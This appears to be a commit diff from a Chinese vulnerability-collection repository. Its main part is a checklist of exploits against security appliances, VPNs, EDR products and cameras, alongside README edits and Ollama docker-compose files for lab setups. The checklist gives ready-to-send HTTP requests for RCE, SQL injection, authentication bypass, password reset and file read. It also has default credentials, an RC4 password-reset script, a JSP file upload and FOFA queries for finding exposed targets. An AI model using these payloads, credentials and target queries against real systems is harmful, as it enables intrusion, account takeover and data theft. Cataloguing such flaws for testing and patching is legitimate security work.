Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token:
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 41
{"command":"run","utilCmdArgs":"-c id"}
```
exp
- https://github.com/h4x0r-dz/RCE-Exploit-in-BIG-IP
- https://github.com/Al1ex/CVE-2021-22986
#### 天融信 Top-app LB
##### SQL注入
```
POST /acc/clsf/report/datasource.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22-- &o=r_Speed&gid=0&lmt=10&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=
```
#### 无密码登录
```
任意用户名 密码:;id
```
### 0x07 VPN
#### Fortigate SSL VPN
FOFA
```
fofa: icon_hash="-404383634" app="FORTINET-防火墙"
```
##### 密码读取 CVE-2018-13379
exphttps://github.com/milo2012/CVE-2018-13379
##### 任意密码重置 CVE-2018-13382
exphttps://github.com/milo2012/CVE-2018-13382
##### 认证绕过 CVE-2022-40684
exphttps://github.com/horizon3ai/CVE-2022-40684
```
git clone https://github.com/horizon3ai/CVE-2022-40684.git
cd CVE-2022-40684
ssh-keygen -t rsa
python3 CVE-2022-40684.py -t 1.1.1.1 --username admin --key-file ~/.ssh/id_rsa.pub
ssh admin@1.1.1.1
```
#### Palo Alto SSL VPN
##### GlobalProtect 远程代码执行 CVE-2019-1579
exphttps://github.com/securifera/CVE-2019-1579
#### Pulse Secure SSL VPN
##### 任意文件读取 CVE-2019-11510
exphttps://github.com/projectzeroindia/CVE-2019-11510
##### 远程代码执行 CVE-2019-11539
exphttps://github.com/0xDezzy/CVE-2019-11539
#### 深信服 VPN
##### 常见密码
```
admin/sangfor@123
sangfor/sangfor
test/test
test1/123456b
```
##### 口令爆破
用户登录若多次尝试登录失败会要求输入验证码若输入错误的验证码会提示“校验码错误或校验码已过期”修改登录请求的数据包清空cookie和验证码字段的值即可绕过验证码此时提示“用户名或密码错误”。
```
/por/login_auth.csp?apiversion=1sangfor/cgi-bin/login.cgi?rnd=
```
##### 短信绕过
```
POST https://ip/por/changetelnum.csp?apiversion=1
newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1
```
##### 任意密码重置
加密算法使用了默认的key攻击者构利用key构造重置密码数据包从而修改任意用户的密码。利用需要登陆账号。
- M7.6.6R1版本key为20181118
- M7.6.1key为20100720
```
POST /por/changepwd.csp
sessReq=clusterd&sessid=0&str=RC4_STR&len=RC4_STR_LEN(脚本计算后结果)
```
```python
from Crypto.Cipher import ARC4
from binascii import a2b_hex
def myRC4(data, key):
rc41= ARC4.new(key)
encrypted =rc41.encrypt(data)
return encrypted. encode('hex')
def rc4_decrpt_hex(data, key):
rc41= ARC4. new(key)
return rc41. decrypt(a2b_hex(data))
key= '20100720'
data = r',username-TARGET_USERNAME, ip-127.0.0.1,grpid-1, pripsw-suiyi , newpsw=TARGET PASSWORD,'
print myRC4(data, key)
```
#### 锐捷 SSL VPN
FOFA
```
icon_hash="884334722" || title="Ruijie SSL VPN"
```
##### 越权访问
- UserName 参数为已知用户名
```
GET /cgi-bin/main.cgi?oper=getrsc HTTP/1.1
Cookie: UserName=admin; SessionId=1; FirstVist=1; Skin=1; tunnel=1
```
#### Juniper SSL VPN
- [Juniper SSLVPN / JunOS RCE and Multiple Vulnerabilities](https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/)
## 三、终端响应与检测
### 0x01 EDR/杀软
#### 深信服 EDR
##### 命令执行1
exphttps://github.com/BH2UOL/sangfor-edr-exploit
##### 命令执行2
```
POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9
{"params":"w=123\"'1234123'\"|命令"}
```
##### 后台任意用户登录
```
xxx.xxx.xxx.xxx/ui/login.php?user=admin
```
#### 360天擎
FOFA
```
title="360天擎"
```
##### 前台SQL注入
```
/api/dp/rptsvcsyncpoint?ccid=1
```
##### 数据库信息泄露
```
http://x.x.x.x/api/dbstat/gettablessize
```
#### 金山 V8 终端安全系统
FOFA
```
title="在线安装-V8+终端安全系统Web控制台"
```
##### 任意文件读取
```
/htmltopdf/downfile.php?filename=downfile.php
```
##### pdf_maker.php 命令执行
```
POST /inter/pdf_maker.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
url=IiB8fCBpcGNvbmZpZyB8fA%3D%3D&fileName=xxx
```
#### 金山 VGM防毒墙
FOFA
```
"金山VGM"
```
##### downFile.php 任意文件读取
poc
```
/downFile.php?filename=../../../../etc/passwd
```
### 0x02 数据防泄漏系统
#### 天融信数据防泄漏系统
##### 越权修改管理员密码
无需登录权限,由于修改密码处未校验原密码,且 /?module=auth_user&action=mod_edit_pwd 接口未授权访问,造成直接修改任意用户密码。 默认 superman 账户 uid 为 1。
```
POST /?module=auth_user&action=mod_edit_pwd
Cookie: username=superman;
uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1
```
## 四、其他
### 0x01 网络摄像机
#### Hikvision DS/IDS/IPC 等设备
FOFA
```
"671-1e0-587ec4a1"
```
##### 远程命令执行 CVE-2021-36260 ✅
```
python CVE-2021-36260.py --rhost 127.0.0.1 --rport 8081 --cmd "ls"
```
### 0x02 综合管理平台
#### 大华 智慧园区综合管理平台
FOFA
```
app="dahua-智慧园区综合管理平台"
```
##### user_save.action 任意文件上传 ✅
漏洞指纹:
```
POST /admin/user_save.action
```
```
POST /WPMS/getPublicKey
```
#### 大华 城市安防监控系统平台管理
FOFA
```
"attachment_downloadByUrlAtt.action"
```
##### attachment_downloadByUrlAtt.action 任意文件下载 ✅
poc
```
/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd
```
#### Hikvision iVMS-8700综合安防管理平台
FOFA
```
icon_hash="-911494769"
```
##### 任意文件下载 ✅
验证POCtoken 为 URL md5
```
/eps/api/triggerSnapshot/download?token=xxx&fileUrl=file:///C:/windows/win.ini&fileName=1
```
##### 任意文件上传 ✅
发送请求包上传文件:
```
POST /eps/resourceOperations/upload.action HTTP/1.1
Host:
------WebKitFormBoundaryTJyhtTNqdMNLZLhj
Content-Disposition: form-data; name="fileUploader";filename="test.jsp"
Content-Type: image/jpeg
<%out.print("hello");%>
------WebKitFormBoundaryTJyhtTNqdMNLZLhj--
```
访问webshell
```
/eps/upload/769badc8ef5944da804a4ca3c8ecafb0.jsp
```

8
README.md
View File

@ -4,11 +4,6 @@
## 0x01 项目导航
- CHECKLIST
* Nacos 漏洞 Checklist
* SmartBi 漏洞 Checklist
* 安全设备漏洞 Checklist
- CMS漏洞
* 74cms v4.2.1 v4.2.129 后台getshell漏洞
@ -737,6 +732,9 @@
* VMware vCenter Server 远程代码执行漏洞 CVE-2021-21972
- 人工智能漏洞
* Huggingface Transformers Checkpoint 反序列化漏洞 CVE-2024-3568
* Ollama 文件存在性泄露漏洞 CVE-2024-39719
* Ollama 文件存在性泄露漏洞 CVE-2024-39722
* Ollama 目录遍历致代码执行漏洞 CVE-2024-37032
- 其他漏洞

11
base/ollama/0.1.33/docker-compose.yml Normal file
View File

@ -0,0 +1,11 @@
services:
ollama:
image: ollama/ollama:0.1.33
container_name: ollama
volumes:
- ollama:/root/.ollama
ports:
- "11434:11434"
volumes:
ollama:

11
base/ollama/0.1.45/docker-compose.yml Normal file
View File

@ -0,0 +1,11 @@
services:
ollama:
image: ollama/ollama:0.1.45
container_name: ollama
volumes:
- ollama:/root/.ollama
ports:
- "11434:11434"
volumes:
ollama:

11
base/ollama/0.3.14/docker-compose.yml Normal file
View File

@ -0,0 +1,11 @@
services:
ollama:
image: ollama/ollama:0.3.14
container_name: ollama
volumes:
- ollama:/root/.ollama
ports:
- "11434:11434"
volumes:
ollama:

22
人工智能漏洞/Ollama 目录遍历致代码执行漏洞 CVE-2024-37032.md
View File

@ -22,10 +22,26 @@ Ollama < 0.1.34
## 环境搭建
Docker 启动 Ollama 0.1.33 服务:
docker-compose.yml
```
docker run -d -v ollama:/root/.ollama -p 11434:11434 --name ollama ollama/ollama:0.1.33
services:
ollama:
image: ollama/ollama:0.1.33
container_name: ollama
volumes:
- ollama:/root/.ollama
ports:
- "11434:11434"
volumes:
ollama:
```
执行如下命令启动 Ollama 0.1.33 服务:
```
docker compose up -d
```
环境启动后,访问 `http://your-ip:11434/`,此时 Ollma 0.1.33 已经成功运行。
@ -85,4 +101,4 @@ https://github.com/Bi0x/CVE-2024-37032
## 漏洞修复
官方已经发布 0.1.34 修复该漏洞,建议升级至 0.1.34 及其以上版本。
- 升级至最新版本 https://github.com/ollama/ollama

BIN
人工智能漏洞/images/Ollama 文件存在性泄露漏洞 CVE-2024-39722/image-20250305140113735.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 43 KiB